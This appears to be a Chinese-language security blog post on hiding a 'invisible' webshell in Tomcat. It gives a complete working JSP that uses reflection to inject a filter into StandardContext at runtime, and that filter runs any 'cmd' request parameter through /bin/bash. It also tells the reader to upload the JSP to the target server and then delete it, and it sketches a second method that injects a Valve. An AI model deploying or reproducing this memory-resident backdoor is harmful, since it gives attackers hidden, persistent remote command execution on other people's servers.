抱著隱藏 shell 的目的去調(diào)試的 tomcat 的代碼。我調(diào)試了tomcat 從接收到一個(gè)socket 到解析socket 并封裝成Request 轉(zhuǎn)發(fā)至 Jsp/Servlet 的全過程，找到了兩個(gè)較為容易實(shí)現(xiàn)的方法(肯定還有其它的方法)，這里記錄一其中一個(gè)。另一個(gè)也很類似所以只記錄一下思路。

1. 運(yùn)行時(shí)動(dòng)態(tài)插入過濾器

過濾器的基礎(chǔ)概念以及作用這里不寫了。

Servlet 規(guī)范(應(yīng)該是從3.0 開始)里面本身規(guī)定了一個(gè)名為ServletContext 的接口，其中有三個(gè)重載方法：

FilterRegistration.Dynamic addFilter(String filterName,String className)  
FilterRegistration.Dynamic addFilter(String filterName,Filter filter)  
FilterRegistration.Dynamic addFilter(String filterName,Class<? extends Filter> filterClass)  

這三個(gè)方法使得我們可以在運(yùn)行時(shí)動(dòng)態(tài)地添加過濾器。

Tomcat 對(duì) ServletContext 接口的實(shí)現(xiàn)類為：org.apache.catalina.core.ApplicationContextFacade

但是并沒有簡單到直接調(diào)用一下這可以實(shí)現(xiàn)，因?yàn)?Tomcat 在對(duì)這個(gè)接口的實(shí)現(xiàn)中，是只允許在容器還沒有初始化完成的時(shí)候調(diào)用這幾個(gè)方法。一旦容器初始化已經(jīng)結(jié)束，調(diào)用時(shí)就會(huì)出現(xiàn)異常：

我看了一下這個(gè) if 之后的語句，并不是太復(fù)雜，這使得我們完全可以自己用代碼來執(zhí)行后面的邏輯。寫的過程也沒有太順利，我完全復(fù)制了后面的邏輯，但是動(dòng)態(tài)插入過濾器卻沒有生效。所以去重新調(diào)試了一遍tomcat 接收處理請(qǐng)求的全過程，發(fā)現(xiàn)為請(qǐng)求組裝filterChain 是在 StandardWrapperValve 里面進(jìn)行的：

真正的組裝方法位于：

org.apache.catalina.core.ApplicationFilterFactory#createFilterChain 

代碼太長不截圖了，有興趣的可以自己去看。

組裝完成后開始調(diào)用過濾器鏈。

我將 org.apache.catalina.core.ApplicationFilterFactory#createFilterChain 方法內(nèi)的細(xì)節(jié)與自己寫的插入過濾器的細(xì)節(jié)做了對(duì)比，得出下面這個(gè)可以在Tomcat 8 (Tomcat 7 上的話需要小改一下)下實(shí)現(xiàn)我想要的目的 Jsp文件。直接看代碼吧：

<%@ page language="java" contentType="text/html; charset=UTF-8" 
    pageEncoding="UTF-8"%> 
<%@ page import="java.io.IOException"%> 
<%@ page import="javax.servlet.DispatcherType"%> 
<%@ page import="javax.servlet.Filter"%> 
<%@ page import="javax.servlet.FilterChain"%> 
<%@ page import="javax.servlet.FilterConfig"%> 
<%@ page import="javax.servlet.FilterRegistration"%> 
<%@ page import="javax.servlet.ServletContext"%> 
<%@ page import="javax.servlet.ServletException"%> 
<%@ page import="javax.servlet.ServletRequest"%> 
<%@ page import="javax.servlet.ServletResponse"%> 
<%@ page import="javax.servlet.annotation.WebServlet"%> 
<%@ page import="javax.servlet.http.HttpServlet"%> 
<%@ page import="javax.servlet.http.HttpServletRequest"%> 
<%@ page import="javax.servlet.http.HttpServletResponse"%> 
<%@ page import="org.apache.catalina.core.ApplicationContext"%> 
<%@ page import="org.apache.catalina.core.ApplicationFilterConfig"%> 
<%@ page import="org.apache.catalina.core.StandardContext"%> 
<%@ page import="org.apache.tomcat.util.descriptor.web.*"%> 
<%@ page import="org.apache.catalina.Context"%> 
<%@ page import="java.lang.reflect.*"%> 
<%@ page import="java.util.EnumSet"%> 
<%@ page import="java.util.Map"%> 
 
 
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> 
<html> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> 
<title>Insert title here</title> 
</head> 
<body> 
<% 
final String name = "n1ntyfilter"; 
 
ServletContext ctx = request.getSession().getServletContext(); 
Field f = ctx.getClass().getDeclaredField("context"); 
f.setAccessible(true); 
ApplicationContext appCtx = (ApplicationContext)f.get(ctx); 
 
f = appCtx.getClass().getDeclaredField("context"); 
f.setAccessible(true); 
StandardContext standardCtx = (StandardContext)f.get(appCtx); 
 
 
f = standardCtx.getClass().getDeclaredField("filterConfigs"); 
f.setAccessible(true); 
Map filterConfigs = (Map)f.get(standardCtx); 
 
if (filterConfigs.get(name) == null) { 
   out.println("inject "+ name); 
    
   Filter filter = new Filter() { 
      @Override 
      public void init(FilterConfig arg0) throws ServletException { 
         // TODO Auto-generated method stub 
      } 
       
      @Override 
      public void doFilter(ServletRequest arg0, ServletResponse arg1, FilterChain arg2) 
            throws IOException, ServletException { 
         // TODO Auto-generated method stub 
         HttpServletRequest req = (HttpServletRequest)arg0; 
         if (req.getParameter("cmd") != null) { 
            byte[] data = new byte[1024]; 
            Process p = new ProcessBuilder("/bin/bash","-c", req.getParameter("cmd")).start(); 
            int len = p.getInputStream().read(data); 
            p.destroy(); 
            arg1.getWriter().write(new String(data, 0, len)); 
            return; 
         }  
         arg2.doFilter(arg0, arg1); 
      } 
       
      @Override 
      public void destroy() { 
         // TODO Auto-generated method stub 
      } 
   }; 
    
   FilterDef filterDef = new FilterDef(); 
    filterDef.setFilterName(name); 
    filterDef.setFilterClass(filter.getClass().getName()); 
    filterDef.setFilter(filter); 
     
    standardCtx.addFilterDef(filterDef); 
    
   FilterMap m = new FilterMap(); 
   m.setFilterName(filterDef.getFilterName()); 
   m.setDispatcher(DispatcherType.REQUEST.name()); 
   m.addURLPattern("/*"); 
    
    
   standardCtx.addFilterMapBefore(m); 
    
    
   Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class); 
   constructor.setAccessible(true); 
   FilterConfig filterConfig = (FilterConfig)constructor.newInstance(standardCtx, filterDef); 
    
    
    filterConfigs.put(name, filterConfig); 
     
    out.println("injected"); 
} 
%> 
</body> 
</html> 

將以上 JSP 文件上傳至目標(biāo)服務(wù)器命名為 n1ntyfilter.jsp，訪問后如果看到“injected” 字樣，說明我們的過濾器已經(jīng)插入成功，隨后可以將此 jsp 文件刪掉。隨后，任何帶有 cmd 參數(shù)的請(qǐng)求都會(huì)被此過濾器攔下來，并執(zhí)行 shell 命令，達(dá)到“看不見的 shell”的效果。

2. 動(dòng)態(tài)插入 Valve

Valve 是 Tomcat 中的用于對(duì)Container 組件(Engine/Host/Context/Wrapper)進(jìn)行擴(kuò)展一種機(jī)制。通常是多個(gè)Valve組裝在一起放在Pipeline 里面。Tomcat 中 Container 類型的組件之間的上下級(jí)調(diào)用基本上都是通過pipeline 與 valve 完成的。如果你熟悉 Struts2 中的攔截器機(jī)制，那么你會(huì)很容易理解valve + pipeline 的動(dòng)作方式。Pipeline 就相當(dāng)于攔截器鏈，而valve就相當(dāng)于攔截器。

Valve 接口定義了如下的 invoke 方法：

publicvoid invoke(Request request, Response response) 
    throws IOException, ServletException; 

我們只需在運(yùn)行時(shí)向 Engine/Host/Context/Wrapper 這四種 Container 組件中的任意一個(gè)的pipeline 中插入一個(gè)我們自定義的 valve，在其中對(duì)相應(yīng)的請(qǐng)求進(jìn)行攔截并執(zhí)行我們想要的功能，就可以達(dá)到與上面Filter 的方式一樣的效果。而且 filter 只對(duì)當(dāng)前context 生效，而valve 如果插到最頂層的container 也就是 Engine，則會(huì)對(duì) Engine 下的所有的context 生效。

以上兩種方式，利用的時(shí)候都必須是通過 HTTP 的方式去真正地發(fā)起一個(gè)請(qǐng)求，因?yàn)樵谶@些流程之前，Tomcat會(huì)檢查接收自socket的前幾個(gè)字節(jié)是不是符合HTTP 協(xié)議的要求，雖然被請(qǐng)求的文件可以不存在。如果想利用非HTTP 協(xié)議，則需要在tomcat 的Connector 上做手腳，這個(gè)復(fù)雜度就比以上兩種方式要高很多了。

以上兩種方式都會(huì)在 Tomcat 重啟后失效。